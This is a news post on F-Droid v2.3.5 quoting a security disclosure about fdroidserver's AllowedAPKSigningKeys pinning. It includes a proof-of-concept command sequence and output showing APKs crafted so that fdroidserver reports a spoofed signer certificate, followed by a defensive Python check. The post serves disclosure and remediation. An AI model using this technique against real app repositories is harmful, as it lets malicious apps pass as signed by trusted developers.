
BREAKING NEWS: F-Droid fixes a major certificate problem in v2.3.5
The long-smouldering conflicts around best practice at F-Droid are now bearing their first constructive fruit: the brand-new version 2.3.5 fixes problems around v1-only signatures. Updating is warmly recommended.
F-Droid v2.3.5 is out and fixes security problems related to v1-only signatures. A prompt update is therefore advised. Calling all F-Bots…
💱 Changelog:
- Fixed a problem where APKs with v1-only signatures and targetSdkVersion < 30 could be crafted maliciously to bypass AllowedAPKSigningKeys (!1588)
- Ignore apksigner v33.x, it has bugs verifying APKs with v3/v3.1 signatures (!1593)
- Sync translations for: ca cs de es fr ga ja pt_BR pt_PT ru sq sr uk zh_Hans
s3n🧩net wishes you much enjoyment with your free Android
⏰ Update: Not ALL the little problems are fixed yet. Stay tuned…
⏰ Update: It's complicated
More info: https://www.openwall.com/lists/oss-security/2025/01/20/1
⏰ Update: It's really complicated
Even more info: https://www.openwall.com/lists/oss-security/2025/01/20/1
Message-ID: <Z42Y1FjRnsbw5GZD@nihonium>
Date: Mon, 20 Jan 2025 01:29:08 +0100
From: Fay Stegerman <flx@...usk.net>
To: oss-security@...ts.openwall.com
Subject: fdroidserver AllowedAPKSigningKeys certificate pinning fundamentally unreliable

Hi!

Another update for [1,2,3], still published at [4]: another PoC (bringing the total to 6) and a lot of new background information.

I've attached the new and updated files and included the new sections from the README with the updates below.

- Fay

[1] https://www.openwall.com/lists/oss-security/2024/04/08/8
[2] https://www.openwall.com/lists/oss-security/2024/04/20/3
[3] https://www.openwall.com/lists/oss-security/2025/01/03/1
[4] https://github.com/obfusk/fdroid-fakesigner-poc
⏰ Update: from the POC
IzzyOnDroid (still) uses fdroidserver. However, IzzyOnDroid applies the patches recommended by the security expert, both in the corresponding issue at fdroidserver and in the POC.
⏰ Update: obfusk (f-droid fakesigner) with an update from today
Update (2025-01-22)

APKsigner

It seems F-Droid is now blaming the bugs in their own code on apksigner [17]:

apksigner v33.0.x falsely verifies invalid APK which leads to wrong cert extracted for AllowedAPKSigningKeys

They are clearly aware that the APK, whilst indeed containing a v3.1 signature without a corresponding v3 signature, is considered perfectly valid by Android itself and installs without any problems on Android 13-15:

"I could install the poc-v6.apk in an SDK-34 emulator."

Yet they blame apksigner versions supporting v3.1 signatures but lacking an extra check that was added in later versions instead of acknowledging that the reason fdroidserver incorrectly returns the wrong certificate is that their own code is simply ignoring v3.1 signatures: yet another example that "different implementations can open up exploit vectors" and still nothing done to address that underlying issue.

NB: apksigner is correct to have added this extra check as v3.1 signatures should always have a corresponding v3 signature. But the lack of a corresponding v3 signature does not have any security implications for Android, which correctly considers such signatures valid. And there would have been no security implications for fdroidserver either if not for its fundamentally broken approach to extracting the certificate using custom Python code instead of relying on apksig for both verification and extraction to guarantee the extracted certificate is the same one actually used for verification.

POC

NB: you currently need the signing branch of apksigtool [9].

NB: the "fake" signer shown here is from the official F-Droid client (its APK has a v1+v2+v3 signature), the one apksigner sees is randomly generated by make-key.sh; the app.apk used for testing had minSdk 26 and a v2 signature only. Using APKs with other signature scheme combinations is certainly possible, but might require adjusting the PoC code accordingly.

$ ./make-key.sh            # generates a dummy key
$ python3 make-poc-v1.py   # uses app.apk (needs minSdk >= 24) as base, adds fake.apk .RSA
$ python3 fdroid.py        # verifies and has fake.apk as signer according to F-Droid
True
43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab
$ python3 make-poc-v2.py   # uses app.apk as base, adds signing block from fake.apk
$ python3 fdroid.py        # verifies and has fake.apk as signer according to F-Droid
True
43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab
$ apksigner verify -v --print-certs poc.apk | grep -E '^Verified using|Signer #1 certificate (DN|SHA-256)'
Verified using v1 scheme (JAR signing): false
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
Verified using v4 scheme (APK Signature Scheme v4): false
Signer #1 certificate DN: CN=oops
Signer #1 certificate SHA-256 digest: 029df1354735e81eb97c9bbef2185c8ead3bc78ae874c03a6e96e1e1435ac519

$ mkdir fakesigner
$ cd fakesigner
$ fdroid init -d oops --repo-keyalias fakesigner
$ mkdir metadata
$ printf 'Name: MyApp\nAllowedAPKSigningKeys: 43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab\n' > metadata/some.app.id.yml
$ cp /path/to/poc.apk repo/
$ fdroid update
$ jq '.packages[].versions[].manifest.signer.sha256' < repo/index-v2.json
[
  "43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab"
]
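The consistency check the README argues for, written out here in Python as an added example (not code from the PoC repository or from fdroidserver): pin only the certificate the verifier itself reports, and refuse the APK outright when an independently extracted certificate disagrees with it. The apksigner output and both digests are the ones quoted above; the function names and the acceptance policy are assumptions of this example.

```python
import re

# Constructed sample input: the `apksigner verify -v --print-certs` output quoted
# above for poc.apk. The parsing and policy code around it is added here, not taken
# from fdroidserver or the PoC repository.
APKSIGNER_OUTPUT = """\
Verified using v1 scheme (JAR signing): false
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
Verified using v4 scheme (APK Signature Scheme v4): false
Signer #1 certificate DN: CN=oops
Signer #1 certificate SHA-256 digest: 029df1354735e81eb97c9bbef2185c8ead3bc78ae874c03a6e96e1e1435ac519
"""

# Digest that fdroidserver's own extraction reported for the same APK (quoted above),
# which is also the value pinned in AllowedAPKSigningKeys in the PoC.
FDROIDSERVER_DIGEST = "43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab"
ALLOWED = {FDROIDSERVER_DIGEST}

SCHEME_RE = re.compile(r"^Verified using v([0-9.]+) scheme .*: (true|false)$")
DIGEST_RE = re.compile(r"^Signer #\d+ certificate SHA-256 digest: ([0-9a-f]{64})$")


def parse_apksigner(output):
    """Return (set of scheme versions verified 'true', list of signer digests)."""
    schemes, digests = set(), []
    for line in output.splitlines():
        m = SCHEME_RE.match(line)
        if m and m.group(2) == "true":
            schemes.add(m.group(1))
        m = DIGEST_RE.match(line)
        if m:
            digests.append(m.group(1))
    return schemes, digests


def signer_allowed(output, allowed, independent_digest=None):
    """Accept the APK only if every certificate the verifier itself used is pinned.
    When a digest from a second, independent extraction (e.g. custom parsing code)
    is supplied, it must equal one the verifier reports; a mismatch means the two
    code paths saw different signers, which is the condition the PoC exploits.
    """
    schemes, digests = parse_apksigner(output)
    if not schemes or not digests:
        return False  # nothing verified, or no certificate reported
    if independent_digest is not None and independent_digest not in digests:
        return False  # extraction and verification disagree: refuse, trust neither
    return all(d in allowed for d in digests)
```

With the quoted PoC data, the pinned 43238d… digest never appears in the verifier's output, so the APK is refused; the earlier bug came from pinning against a digest the verifier never used.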
Stay tuned…